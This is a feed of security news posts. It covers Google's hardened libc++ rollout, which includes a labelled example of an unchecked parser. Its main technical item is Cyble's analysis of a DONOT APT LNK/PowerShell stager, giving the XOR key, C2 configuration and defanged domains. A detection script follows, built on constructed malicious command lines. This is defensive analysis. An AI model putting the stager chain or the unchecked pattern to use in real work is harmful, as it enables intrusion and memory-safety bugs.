This post explains how we're retrofitting hardened libc++ across our codebases and showcases the positive impact it's already having, including preventing exploits, reducing crashes, and improving code correctness.

Bounds-checked data structures: The foundation for spatial safety
One of our primary strategies for improving spatial safety in C++ is to implement bounds checking for common data structures, starting with hardening the C++ standard library (in our case, LLVM's libc++). Hardened libc++, recently added by open source contributors, introduces a set of security checks designed to catch vulnerabilities such as out-of-bounds accesses in production. For example, hardened libc++ ensures that every access to an element of a std::vector stays within its allocated bounds, preventing attempts to read or write beyond the valid memory region. Similarly, hardened libc++ checks that a std::optional isn't empty before allowing access, preventing access to uninitialized memory. This approach mirrors what's already standard practice in many modern programming languages like Java, Python, Go, and Rust. They all incorporate bounds checking by default, recognizing its crucial role in preventing memory errors. C++ has been a notable exception, but efforts like hardened libc++ aim to close this gap in our infrastructure. It's also worth noting that similar hardening is available in other C++ standard libraries, such as libstdc++.

Raising the security baseline across the board
Building on the successful deployment of hardened libc++ in Chrome in 2022, we've now made it default across our server-side production systems. This improves spatial memory safety across our services, including key performance-critical components of products like Search, Gmail, Drive, YouTube, and Maps. While a very small number of components remain opted out, we're actively working to reduce this and raise the bar for security across the board, even in applications with lower exploitation risk.
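What "enabling hardened mode" means in practice, as an added example that is not code from the Google post: the record format (tag, length, payload), the file name and the two parser functions are hypothetical and chosen only for illustration; the compile lines use the real libc++ macro (`_LIBCPP_HARDENING_MODE`, LLVM 18 and later; `_LIBCPP_ENABLE_ASSERTIONS` before that) and the libstdc++ equivalent (`_GLIBCXX_ASSERTIONS`) the post alludes to. `hardening_mode_name()` lets a build or test assert that the mode it expects is actually in effect, which is the check most teams forget after flipping the flag.

```cpp
// Added example, not code from the Google post. It shows how to confirm at
// compile time which standard-library hardening mode a translation unit was
// built with, and what that mode changes, using a small length-prefixed record
// parser (a hypothetical format) written twice: once with the always-checked
// accessor, once in the idiomatic unchecked style that hardened libc++
// retrofits a check onto.
//
// libc++ (LLVM 18+): clang++ -std=c++17 -stdlib=libc++ \
//                      -D_LIBCPP_HARDENING_MODE=_LIBCPP_HARDENING_MODE_FAST records.cpp
// libstdc++:         g++ -std=c++17 -D_GLIBCXX_ASSERTIONS records.cpp
#include <cstddef>
#include <cstdint>
#include <iostream>
#include <optional>
#include <stdexcept>
#include <string>
#include <utility>
#include <vector>

// Evaluated after the standard headers are included, which is where libc++
// sets its default mode; a build can fail if this does not report "hardened".
std::string hardening_mode_name() {
#if defined(_LIBCPP_HARDENING_MODE) && (_LIBCPP_HARDENING_MODE != _LIBCPP_HARDENING_MODE_NONE)
    return "libc++ hardened";
#elif defined(_LIBCPP_ENABLE_ASSERTIONS) && _LIBCPP_ENABLE_ASSERTIONS
    return "libc++ assertions (LLVM 15-17 spelling)";
#elif defined(_GLIBCXX_ASSERTIONS)
    return "libstdc++ assertions";
#else
    return "none";
#endif
}

struct Record {
    std::uint8_t tag;
    std::vector<std::uint8_t> payload;
};

// Records are "tag, length, payload[length]". at() is bounds-checked in every
// build, so a truncated record throws std::out_of_range instead of reading
// past the end of the buffer; the parser reports that as malformed input.
std::optional<std::vector<Record>> parse_records(const std::vector<std::uint8_t>& buf) {
    std::vector<Record> out;
    std::size_t pos = 0;
    try {
        while (pos < buf.size()) {
            Record r;
            r.tag = buf.at(pos);
            const std::size_t len = buf.at(pos + 1);
            for (std::size_t i = 0; i < len; ++i)
                r.payload.push_back(buf.at(pos + 2 + i));
            pos += 2 + len;
            out.push_back(std::move(r));
        }
    } catch (const std::out_of_range&) {
        return std::nullopt;
    }
    return out;
}

// The same parser the way most C++ is written: operator[] trusting the length
// byte. On a truncated record this reads beyond the vector's storage, which is
// undefined behaviour in an unhardened build and an immediate, diagnosable
// trap under hardened libc++ or _GLIBCXX_ASSERTIONS. Only call it on input
// that has already been validated.
std::vector<Record> parse_records_unchecked(const std::vector<std::uint8_t>& buf) {
    std::vector<Record> out;
    std::size_t pos = 0;
    while (pos < buf.size()) {
        Record r;
        r.tag = buf[pos];
        const std::size_t len = buf[pos + 1];
        for (std::size_t i = 0; i < len; ++i)
            r.payload.push_back(buf[pos + 2 + i]);
        pos += 2 + len;
        out.push_back(std::move(r));
    }
    return out;
}

int main() {
    std::cout << "hardening: " << hardening_mode_name() << "\n";
    const std::vector<std::uint8_t> good = {0x01, 0x02, 0xAA, 0xBB, 0x02, 0x00};
    const std::vector<std::uint8_t> truncated = {0x01, 0x05, 0xAA};  // claims 5 payload bytes, has 1
    std::cout << "good: " << parse_records(good)->size() << " records\n";
    std::cout << "truncated: " << (parse_records(truncated) ? "parsed" : "rejected") << "\n";
    // parse_records_unchecked(truncated) is the call the hardening checks turn
    // from a silent out-of-bounds read into a trap; see the build lines above.
    return 0;
}
```

Building the same file with and without the hardening define and running the unchecked parser on the truncated input is the quickest way to see the difference the post describes: one binary reads garbage, the other aborts at the offending access.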
The performance impact of these changes was surprisingly low, despite Google's modern C++ codebase making heavy use of libc++. Hardening libc++ resulted in an average 0.30% performance impact across our services (yes, only a third of a percent). This is due to both the compiler's ability to eliminate redundant checks during optimization, and the efficient design of hardened libc++. While a handful of performance-critical code paths still require targeted use of explicitly unsafe accesses, these instances are carefully reviewed for safety. Techniques like profile-guided optimizations further improved performance, but even without those advanced techniques, the overhead of bounds checking remains minimal.

We actively monitor the performance impact of these checks and work to minimize any unnecessary overhead. For instance, we identified and fixed an unnecessary check, which led to a 15% reduction in overhead (reduced from 0.35% to 0.3%), and contributed the fix back to the LLVM project to share the benefits with the broader C++ community. While hardened libc++'s overhead is minimal for individual applications in most cases, deploying it at Google's scale required a substantial commitment of computing resources. This investment underscores our dedication to enhancing the safety and security of our products.

From tests to production
Enabling libc++ hardening wasn't a simple flip of a switch. Rather, it required a multi-stage rollout to avoid accidentally disrupting users or creating an outage:
- Testing: We first enabled hardened libc++ in our tests over a year ago. This allowed us to identify and fix hundreds of previously undetected bugs in our code and tests.
- Baking: We let the hardened runtime "bake" in our testing and pre-production environments, giving developers time to adapt and address any new issues that surfaced. We also conducted extensive performance evaluations, ensuring minimal impact to our users' experience.
- Gradual Production Rollout: We then rolled out hardened libc++ to production over several months, starting with a small set of services and gradually expanding to our entire infrastructure. We closely monitored the rollout, promptly addressing any crashes or performance regressions.

Quantifiable impact
In just a few months since enabling hardened libc++ by default, we've already seen benefits.
- Preventing exploits: Hardened libc++ has already disrupted an internal red team exercise and would have prevented another one that happened before we enabled hardening, demonstrating its effectiveness in thwarting exploits. The safety checks have uncovered over 1,000 bugs, and would prevent 1,000 to 2,000 new bugs yearly at our current rate of C++ development.
- Improved reliability and correctness: The process of identifying and fixing bugs uncovered by hardened libc++ led to a 30% reduction in our baseline segmentation fault rate across production, indicating improved code reliability and quality. Beyond crashes, the checks also caught errors that would have otherwise manifested as unpredictable behavior or data corruption.
Figure: Moving average of segfaults across our fleet over time, before and after enablement.
- Easier debugging: Hardened libc++ enabled us to identify and fix multiple bugs that had been lurking in our code for more than a decade. The checks transform many difficult-to-diagnose memory corruptions into immediate and easily debuggable errors, saving developers valuable time and effort.

Bridging the gap with memory-safe languages
While libc++ hardening provides immediate benefits by adding bounds checking to standard data structures, it's only one piece of the puzzle when it comes to spatial safety. We're expanding bounds checking to other libraries and working to migrate our code to Safe Buffers, requiring all accesses to be bounds checked. For spatial safety, both hardened data structures, including their iterators, and Safe Buffers are necessary. Beyond improving the safety of our C++, we're also focused on making it easier to interoperate with memory-safe languages. Migrating our C++ to Safe Buffers shrinks the gap between the languages, which simplifies interoperability and potentially even an eventual automated translation.

Building a safer C++ ecosystem
Hardened libc++ is a practical and effective way to enhance the safety, reliability, and debuggability of C++ code with minimal overhead. Given this, we strongly encourage organizations using C++ to enable their standard library's hardened mode universally by default. At Google, enabling hardened libc++ is only the first step in our journey towards a spatially safe C++ codebase. By expanding bounds checking, migrating to Safe Buffers, and actively collaborating with the broader C++ community, we aim to create a future where spatial safety is the norm.

Acknowledgements
We'd like to thank Emilia Kasper, Chandler Carruth, Duygu Isler, Matthew Riley, and Jeff Vander Stoep for their helpful feedback. We also extend our thanks to the libc++ community for developing the hardening mode that made this work possible.

[1] Based on manual analysis of CVEs from July 15, 2014 to Dec 14, 2023. Note that we could not classify 11% of CVEs.
by Google Security Blog
2024-11-15 12:40:46
Interconnectivity and cyber risk: A double-edged swordBy David Warr, Cyber Portfolio Manager for QBE Europe Against a backdrop of a world more connected than ever before, businesses are increasingly dependent on integrating new emerging technologies. From AI-powered tools to cloud-based services and connected devices, the opportunities for rapid growth and increased efficiency are obvious. But this online interconnectivity and reliance on […] The post Interconnectivity and cyber risk: A double-edged sword appeared first on IT Security Guru.
by IT Security Guru
2024-11-15 12:26:56
What’s new at Hunter? (November 2024)In the past months, our goal at Hunter has been to simplify finding target companies, segmenting them, and reaching out in a seamless email outreach process. The most recent updates to our platform closely reflect that goal.
by The Hunter Blog
2024-11-15 12:10:00
High-Severity Flaw in PostgreSQL Allows Hackers to Exploit Environment VariablesCybersecurity researchers have disclosed a high-severity security flaw in the PostgreSQL open-source database system that could allow unprivileged users to alter environment variables, and potentially lead to code execution or information disclosure. The vulnerability, tracked as CVE-2024-10979, carries a CVSS score of 8.8. Environment variables are user-defined values that can allow a program
by The Hacker News
2024-11-15 12:00:00
What Comes After HoloLens 2? Exploring Microsoft’s AR/VR FutureMicrosoft revealed no plans for an immediate HoloLens 2 successor, raising questions about the company’s commitment to its VR/AR technologies.
by ITPro Today
2024-11-15 11:00:00
Bitfinex Hacker Sentenced to 5 Years, Guilty of Laundering $10.5 Billion in BitcoinIlya Lichtenstein, who pleaded guilty to the 2016 hack of cryptocurrency exchange Bitfinex, has been sentenced to five years in prison, the U.S. Department of Justice (DoJ) announced Thursday. Lichtenstein was charged for the theft of nearly 120,000 bitcoins (valued at over $10.5 billion at current prices) from the crypto exchange and for his involvement in the scheme to launder the proceeds.
by The Hacker News
2024-11-15 10:40:24
Sailing Into Danger: DONOT APT's Attack on Maritime & Defense Manufacturing

Key Takeaways
- Cyble Research and Intelligence Labs (CRIL) came across a campaign linked to the known APT group DONOT, targeting the manufacturing industry that supports Pakistan's maritime and defense sectors.
- The campaign uses a malicious LNK file disguised as an RTF and containing encrypted data. The file is decrypted via PowerShell to deliver a lure RTF and the payload.
- A scheduled task is then created to ensure the malware runs every five minutes for persistence.
- Random domains are generated from hardcoded words and TLDs to serve as backup C&C servers.
- The encryption method for C&C communication has changed compared to previous campaigns: the stager malware now communicates with the C&C server using AES encryption and Base64 encoding to evade detection.
- The decryption key for the second-stage payload is now in the downloaded binary rather than hardcoded in the config file.
- The victim's system information is collected before delivering the final payload, to assess the target's value.
- The stager malware uses environment variables to store critical configuration details, like C&C addresses and task information.

Overview
CRIL recently came across a campaign seemingly aimed at Pakistan's manufacturing industry, which supports the country's maritime and defense sectors. After analyzing the files involved in the campaign, it was determined that the attack was linked to the known APT group DONOT. DoNot, also known as APT-C-35, is an Advanced Persistent Threat (APT) group operating since 2016. This group has a history of targeting government and military entities, as well as foreign affairs ministries and embassies across South Asia.

Figure 1 - Cyble Vision Threat Library

In this recent campaign, the Threat Actor (TA) uses the .LNK file as the initial infection vector, which could arrive within a RAR archive via spam email. The .LNK file is disguised as an RTF file, leading users to believe they are opening a legitimate document. When the user clicks to execute it, it triggers cmd.exe and powershell.exe to run additional malicious commands, loading the stager malware (a DLL file) and establishing persistence by creating a scheduled task to execute the DLL through rundll32.exe. The stager also communicates with the primary C&C server by sending a unique device ID via a POST request and, in response, receives control commands from the TA to direct its next actions. These actions include self-destruction and the deployment of additional malicious payloads, by downloading an encrypted payload from a specified URL and then executing it. To evade detection and complicate analysis, C&C traffic is now protected with a different encryption method instead of the single-byte XOR key used in previous campaigns (the lure and DLL embedded in the .LNK are still XOR-encoded, as described below). The figure below shows the infection chain.

Figure 2 - Infection Chain

This .LNK file campaign was first identified by StrikeReady Labs, who reported it on the X platform. A similar campaign was also seen in July 2024, targeting Pakistan's government agencies and manufacturing industries using sector-specific lures. In the previous campaign, the TA employed malicious Office files with embedded macros and Rich Text Format (RTF) files that exploit vulnerabilities to load the stager DLL onto victim machines. Compared with the previous campaigns, the initial infection vector has shifted from Microsoft Office files to .LNK files. Additionally, the stager DLL now employs an enhanced payload delivery method and improved C&C communication, incorporating encryption mechanisms at various stages.

Technical Analysis
The malicious .LNK file contains PowerShell commands, an encrypted lure RTF file, and the encrypted stager payload.
Upon execution, the “.LNK” file initiates “cmd.exe,” which creates a directory in the “%temp%” path and copies “powershell.exe” to this location as ""2SqSxDA2.exe."" The newly copied PowerShell process subsequently executes the PowerShell code embedded in the LNK file. The figure below shows the partial content of the LNK file. Figure 3 – Partial contents of the LNK file PowerShell Code The PowerShell command embedded within the “.LNK” file retrieves both a lure file and a DLL from the “.LNK” itself. It identifies the “.LNK” file based on its file size and directory path, then decrypts the lure RTF file and the DLL file using a single-byte XOR operation with “0xB2.” Decryption begins at offset “0x1774” for the lure file and “0x79AF” for the DLL. These extracted files are stored in the “%temp%\7GGVXwRn” directory. Once extraction is complete, the PowerShell command deletes the PowerShell copy “2SqSxDA2.exe,” opens the lure document, and calls “rundll32.exe” to execute the DLL, invoking the export function “HgCallClient.” Figure 4 - Content of PowerShell commands Lure Document The lure document is related to Karachi Shipyard & Engineering Works (KS&EW), a prominent defense contractor and shipbuilding company in Pakistan. This suggests that the TA is targeting industries supporting the defense sector. The figure below shows the lure document. Figure 5 - Lure Document DLL file analysis Upon execution, the DLL begins extracting configuration details from an embedded JSON file. This configuration includes information such as the configuration filename, environment variable name, server domain, transit keys for secure communication, mutex, and user-agent string. The table below shows the configuration details. 
Filed Name Value ConfigFileName Config.json EnvVarTaskName PFTN HMAC_Security j4fhrJpSqvgE MachineMutex 5734b817-1bb8-402b-a761-da8f2e188baf ServerDomain hxxps://internalfileserver[.]online:443/ TransitKey tTRxrb0kmbQGpdci TransitSalt aWrtRHXuEBy6CwXj userAgent Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 BackupServerURL hxxps://safehydratedcloudcosmoswebglobe[.]cc/ PrimaryServerUrl hxxps://internalfileserver[.]online:443/ FirstTaskName Schedule TaskDefinition This service enables a user to configure and schedule automated tasks on this computer. It also hosts multiple Windows system-critical tasks. If this service is stopped or disabled, these tasks will not be run at their scheduled times, and any services that explicitly depend on it will fail to start. Random domain generation The BackupServerURL mentioned in the config file is generated by selecting six values from a hardcoded array of words and concatenating them to create a domain. A TLD is then selected from a separate array of TLD values. This randomly generated domain serves as a backup for Command and Control (C&C) communication. The figure below shows the list of available words used for generating random domains. Figure 6 - Random Domain Generation Persistence After extracting the configuration details, the DLL checks for the presence of a specific scheduled task named “Schedule.” If the task is not found, it creates a new task to execute the DLL via “rundll32.exe” every 5 minutes for one day, as shown in the figure below. Figure 7 - Scheduled Task After establishing persistence, the DLL sends a POST request to the primary server URL. 
This request includes headers such as an HMAC (Hash-based Message Authentication Code) generated from the HTTP method, contact URL, current DateTime, and an HMAC secret key, along with an ""X-Timestamp."" The request body contains the unique DeviceID and configuration filename, encrypted using a hardcoded AES transit key and salt, then base64 encoded before being sent to the C&C primary URL. This encryption method marks a relatively new approach in this campaign compared to previous ones observed. Figure 8 - C&C communication If the C&C server responds with a status code of 200, the response content contains JSON configuration data, which is decrypted using the same AES transit key and IV. The decrypted data includes the following details: DownloadURL FileDropEnvironment FileDropName ExportFunctionName TaskName Self_Destruction (boolean) Execution (boolean) Figure 9 – JSON configuration The decrypted JSON configuration data allows the TA to control key aspects of the malware''s behavior, such as downloading additional payloads, specifying file locations, and configuring execution options. This enables flexibility to adjust the attack as needed. Next Stage payload Execution If the TA intends to execute an additional payload, the encrypted payload is downloaded according to the C&C configuration. It is then decrypted using an XOR key found within the encrypted file, just after a sequence of magic bytes, and processed using the XOR round-robin method, as shown in Figure 10. This process differs from a previous campaign where the encrypted data was fetched from a URL, and the decryption key was provided directly in the C&C configuration, as shown in Figure 11. Once decryption is successful, the data is verified as a valid binary by checking for the presence of the string ""This program cannot be run in DOS mode"". The decrypted payload is then placed in the directory specified by the “FileDropEnvironment” variable. 
Figure 10 - Decrypting the Payload (Latest Campaign) Figure 11 - Decrypting the payload (Previous campaign) After verifying the binary, the stager malware creates a scheduled task to execute the decrypted binary using “rundll32.exe”. The task name and execution interval are specified in the configuration details provided by the TA via the C&C. Figure 12 - Scheduled task In case of a decryption failure, the stager malware updates the configuration with the backup server URL and logs the error message ""File corruption while decrypting"" It also collects detailed system information, such as disk space and installed security products, to help identify the cause of the decryption failure. This information is then sent to the TA via POST request. Figure 13 – Gathering System information In case of successful payload deployment through the scheduled task, the stager malware logs the event in the same manner as it does for a failure, with the only difference being that the result is recorded as ""Payload Deployment Successful."" This log also contains detailed system information, helping the TA identify potential targets in case of success and detect security solutions in case of failure. The TA collects and logs all relevant details, regardless of the outcome, and sends the information to the TA''s C&C via POST request. Figure 14 - Sending JSON log as a POST request The stager malware typically stores data, including the number of attempts to communicate with the C&C, the primary C&C domain name, the last connection date, the backup domain name, and details of the second-stage payload. These values are stored as encrypted entries in the environment variables, as shown in the table below. 
Variable Name Value Decrypted value NFC (Not Found Count) iOJDUU+oq2I1wQwfdYl98w== 2 PDN (Primary Domain Name) ehdXQoPR9RjVlJYUWq+tIkQkazp1KhA1+59IGAXaXL94XRvH8aNbs9pv3e6PLCKK hxxps://internalfileserver[.]online:443/ LCD (Last Check Date) vKXaygaagiZygkd7/K+uvQ== 11-11-2024 BDN (Backup Domain Name) ""tc6rjFyW2AVO6pu2y/c/Vg626iQ+S/FHqYIGBpIejquLjQJwMxVv/r6q44XNnInvBJPP86CLYx9qKJ0lMfryxQ=="" hxxps://floridacloudcyberhydratedfloridatech[.]online/ During our testing, the C&C server was unavailable, preventing us from receiving a response. As a result, we were unable to observe or analyze the behavior of the next-stage DLL payload, which would have been triggered by communication with the C&C server. Without this crucial interaction, we could not fully understand how the payload executes or what further actions it might take. Self-Deletion If the TA activates the self-destruction command via C&C, the stager malware removes the scheduled task and initiates self-deletion by executing the “DEL” command through “cmd.exe”. The image below illustrates the self-deletion process. Figure 15 - Self delete Threat Actor Attribution The malicious DLL connects to the C&C server ""internalfileserver[.]online,"" which resolves to the IP address ""94[.]141.120[.]137."" This same IP address previously hosted the domain ""office-updatecentral[.]com,"" which was used by the DoNot APT group in a prior campaign. Also, the tactics, techniques, and procedures (TTPs) observed in this campaign exhibit similar behavior to those reported by the 360 Threat Intelligence Centre. Conclusion This DoNot APT campaign shows an evolution in tactics. It uses malicious LNK files, PowerShell for payload delivery, and scheduled tasks for persistence. The group also employs dynamic domain generation for backup C&C servers and has updated its encryption methods to avoid detection. 
The shift in how decryption keys are handled and the collection of system information before payload delivery indicate a more sophisticated approach. These changes highlight the growing complexity of APT campaigns and the need for improved detection and defense strategies. Threat hunting Packages The threat hunting package, including YARA and Sigma rules capable of detecting this campaign, can be downloaded from the linked GitHub pages. Recommendations Deploy robust EDR solutions to monitor unusual PowerShell activity, scheduled task creation, and suspicious network connections to C&C servers. Ensure these tools are configured to flag and alert on anomalies. Limit the execution of PowerShell and other scripting tools to necessary users only and enforce least privilege policies to prevent malware from escalating privileges and performing malicious actions. Conduct frequent audits of scheduled tasks to identify any unusual or unauthorized tasks, particularly those involving rundll32.exe. Ensure only trusted applications are allowed to create or execute scheduled tasks. Implement behavior-based detection systems that can identify malicious actions, such as frequent attempts to contact C&C servers or unexpected encrypted data being transmitted. Implement a well-defined incident response plan with clear steps to handle potential APT intrusions. This plan should include rapid identification, containment, and recovery from any detected malicious activity. Conduct regular cybersecurity awareness training for employees, focusing on identifying phishing emails and handling suspicious attachments to reduce the risk of initial infection. MITRE ATT&CK® Techniques Tactic Technique Procedure Initial Access (TA0001) Phishing (T1566) This campaign is likely to reach users through spam emails. Execution (TA0002) Command and Scripting Interpreter: PowerShell (T1059.001) PowerShell commands are used to decrypt and execute the lure RTF file and stager DLL payload. 
Execution (TA0002) Command and Scripting Interpreter: Windows Command Shell (T1059.003) Cmd.exe is used to copy PowerShell.exe to the %temp% directory as ""2SqSxDA2.exe"". Defense Evasion (TA0005) System Binary Proxy Execution: Rundll32 (T1218.011) Rundll32.exe is used to execute the stager payload. Persistence (TA0003) Scheduled Task/Job: Scheduled Task (T1053.005) A scheduled task is created for persistence, running the DLL payload regularly via rundll32.exe. Defense Evasion (TA0005) Indicator Removal on Host: File Deletion (T1070.004) Temporary PowerShell.exe file (""2SqSxDA2.exe"") is deleted after executing the malicious commands. Defense Evasion (TA0005) Obfuscated Files or Information (T1027) XOR and AES encryption mechanisms are used in various stages of the attack Command and Control (TA0011) Application Layer Protocol: Web Protocols (T1071.001) GET and POST requests are sent to the Threat Actor''s C&C server. Command and Control (TA0011) Remote File Copy (T1105) The additional payload is downloaded from the C&C server using a URL provided in the configuration. Exfiltration (TA0010) Exfiltration Over C2 Channel (T1041) Extensive system information is collected and exfiltrated to the C&C server via encrypted communication. Indicators of Compromise Indicator Indicator Type Comments cffe7eb01000de809b79a711702eaf3773f2e6167ce440f33f30bcd6fabcace3 SHA-256 Proc list 2024.lnk a7893c54edaecaa0e56010576a8249ad9149456f5d379868a0ecaa4c5c33fa70 SHA-256 CertPropOrigin.dll Internalfileserver[.]online domain C&C server References: https://mp.weixin.qq.com/s/qCcuU0E6d84tdQ1r2dCsjA https://twitter.com/StrikeReadyLabs/status/1852532673283268899 https://twitter.com/suyog41/status/1814230027560501248 The post Sailing Into Danger: DONOT APT’s Attack on Maritime & Defense Manufacturing appeared first on Cyble.
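The execution chain described in the technical analysis (cmd.exe copying powershell.exe into %temp% under a random name, the renamed copy running the embedded script, rundll32.exe loading a DLL from %temp%, and a scheduled task repeating every five minutes) maps onto a few host-telemetry rules. The following is an added detection example, not part of Cyble's threat-hunting package; the event records are constructed and modelled loosely on Sysmon Event ID 1 and Security Event ID 4698 fields, and the field names, user name and paths are assumptions.

```python
"""Detection rules for the DONOT stager's execution chain over constructed host events.

Added example (not Cyble's tooling). Field names follow Sysmon Event ID 1
(Image, OriginalFileName, CommandLine) and Security Event ID 4698 (TaskContent);
adapt them to your SIEM's schema. All sample events below are constructed.
"""
import re
from typing import Dict, Iterable, List, Tuple

Event = Dict[str, object]

# The stager drops everything under the user's Temp directory (assumption: per-user
# Temp only; extend the pattern if you also want C:\Windows\Temp).
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
DLL_IN_TEMP = re.compile(r"\\AppData\\Local\\Temp\\[^\s\"]+\.dll", re.IGNORECASE)
POWERSHELL_NAMES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def check_process(ev: Event) -> List[str]:
    """Return the rule names that fire on one process-creation event."""
    hits: List[str] = []
    image = basename(str(ev.get("Image", "")))
    orig = str(ev.get("OriginalFileName", "")).lower()
    cmd = str(ev.get("CommandLine", ""))
    # 1. The PE's original file name survives a copy/rename, so a PowerShell binary
    #    running as "2SqSxDA2.exe" still reports OriginalFileName=PowerShell.EXE.
    if orig == "powershell.exe" and image not in POWERSHELL_NAMES:
        hits.append("renamed_powershell")
    # 2. cmd.exe copying powershell.exe into a Temp sub-directory.
    if image == "cmd.exe" and re.search(r"\bcopy\b.*powershell\.exe", cmd, re.I) and TEMP_DIR.search(cmd):
        hits.append("powershell_copied_to_temp")
    # 3. rundll32.exe invoking a DLL that lives in Temp (stager export "HgCallClient").
    if image == "rundll32.exe" and DLL_IN_TEMP.search(cmd):
        hits.append("rundll32_dll_from_temp")
    return hits


def check_task(ev: Event) -> List[str]:
    """Rules for a scheduled-task-created event whose task XML is in 'TaskContent'."""
    hits: List[str] = []
    xml = str(ev.get("TaskContent", ""))
    m_cmd = re.search(r"<Command>([^<]+)</Command>", xml)
    m_args = re.search(r"<Arguments>([^<]*)</Arguments>", xml)
    m_int = re.search(r"<Interval>PT(\d+)M</Interval>", xml)
    command = basename(m_cmd.group(1)) if m_cmd else ""
    args = m_args.group(1) if m_args else ""
    if command == "rundll32.exe" and DLL_IN_TEMP.search(args):
        hits.append("task_rundll32_dll_from_temp")
    # The stager's "Schedule" task re-runs every 5 minutes; such tight repetition is
    # rare for legitimate user tasks and worth a look on its own.
    if m_int and int(m_int.group(1)) <= 5:
        hits.append("task_repeats_every_5min_or_less")
    return hits


def scan(events: Iterable[Event]) -> List[Tuple[int, List[str]]]:
    """Run both rule sets over an event stream; returns (event index, rules fired)."""
    alerts: List[Tuple[int, List[str]]] = []
    for i, ev in enumerate(events):
        hits = check_task(ev) if ev.get("EventID") == 4698 else check_process(ev)
        if hits:
            alerts.append((i, hits))
    return alerts


# Constructed sample events (user "alice" and the exact command lines are assumptions;
# the directory, file names and export come from the analysis above).
TEMP = r"C:\Users\alice\AppData\Local\Temp\7GGVXwRn"
SAMPLE_EVENTS: List[Event] = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "CommandLine": rf'cmd.exe /c mkdir "{TEMP}" & copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "{TEMP}\2SqSxDA2.exe"'},
    {"EventID": 1, "Image": rf"{TEMP}\2SqSxDA2.exe", "OriginalFileName": "PowerShell.EXE",
     "CommandLine": rf'"{TEMP}\2SqSxDA2.exe" -c "<embedded script elided>"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe", "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": rf'rundll32.exe "{TEMP}\CertPropOrigin.dll",HgCallClient'},
    {"EventID": 4698, "TaskName": r"\Schedule",
     "TaskContent": (r"<Task><Triggers><TimeTrigger><Repetition><Interval>PT5M</Interval>"
                     r"<Duration>P1D</Duration></Repetition></TimeTrigger></Triggers>"
                     r"<Actions><Exec><Command>C:\Windows\System32\rundll32.exe</Command>"
                     rf'<Arguments>"{TEMP}\CertPropOrigin.dll",HgCallClient</Arguments>'
                     r"</Exec></Actions></Task>")},
    # Benign noise that must not fire: a normal PowerShell script and a stock rundll32 use.
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE", "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe", "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL"},
]

if __name__ == "__main__":
    for index, rules in scan(SAMPLE_EVENTS):
        print(f"event {index}: {', '.join(rules)}")
```

Only the four constructed stager events fire; the two benign records pass through without an alert.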
by CYBLE
2024-11-15 10:34:00
CISA Flags Two Actively Exploited Palo Alto Flaws; New RCE Attack Confirmed

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday warned that two more flaws impacting the Palo Alto Networks Expedition software have come under active exploitation in the wild. To that end, it has added the vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the necessary updates
by The Hacker News
2024-11-15 10:29:36
60 Hours of Cyber Defense: Hong Kong's Innovative Cybersecurity Drill Begins

Hong Kong has initiated its first-ever cybersecurity drill, set to run for a total of 60 hours. The Hong Kong cybersecurity drill commenced on Friday, with plans to establish it as an annual event moving forward. Innovation minister Sun Dong emphasized the importance of this initiative, stating that maintaining cybersecurity is essential for promoting high-quality economic development and building a smart city. At a launch ceremony for the drill, Sun noted that the Hong Kong cybersecurity plan is a "long-term task" that requires ongoing attention and cannot be considered complete. This proactive approach reflects the government's commitment to addressing the growing threat landscape, particularly as recent months have seen a notable rise in hacking cases targeting various organizations, including companies and public entities.

Hong Kong Cybersecurity Drill

This Hong Kong cybersecurity drill, organized by the Digital Policy Office, involves collaboration with multiple stakeholders, including the Hong Kong police force, the Hong Kong Internet Registration Corporation, and the Hong Kong Institute of Information and Technology (HKIIT). This multifaceted approach aims to simulate real-world cyber threats and test the preparedness of government systems against potential attacks. Tony Wong Chi-kwong, Commissioner for Digital Policy, explained that the drill features a "red" team of hackers composed of industry professionals, alongside students and faculty members from HKIIT and the Hong Kong College of Technology. This red team will simulate cyberattacks on government systems using tactics such as phishing emails and impersonation attempts to gain access to sensitive information, including login credentials and passwords, reported South China Morning Post.

Countering the red team's efforts is a "blue" defense team, made up of staff from nine government departments and three public organizations. These defenders will operate from their offices to detect and respond to the simulated attacks in real time. Wong refrained from disclosing the specific departments involved, explaining that maintaining a controlled environment is crucial to the drill's success. "We need a controllable scenario. We don't want people with malicious intentions to mess around during this period," he stated. Throughout the 60-hour drill, the red team will remain stationed in the operation room at HKIIT in Tsing Yi. Wong pointed out the necessity of this realistic simulation: "In the real world, attacks have no time limit. There is no preset that tells you when they will attack you." By creating an environment that mirrors actual conditions, the drill allows defenders to remain alert and ready to respond to threats as they arise.

Key Partners of the Cybersecurity Drills

As part of the exercise, normal operations will continue on government systems, providing an opportunity to evaluate whether current precautions and detection capabilities are sufficient. The blue team will earn points for successfully detecting an attack, while the red team will score points for any successful breaches. A panel of nine cybersecurity experts will oversee the scoring process, ensuring fairness and accuracy in the evaluation. The HKIIT principal confirmed that all attack and defense activities will adhere to strict parameters established by the institute. Technical support will also be provided to maintain network stability, preventing disruptions to regular operations during the drill. Results from this cybersecurity drill will be shared at an upcoming cybersecurity forum scheduled for December.

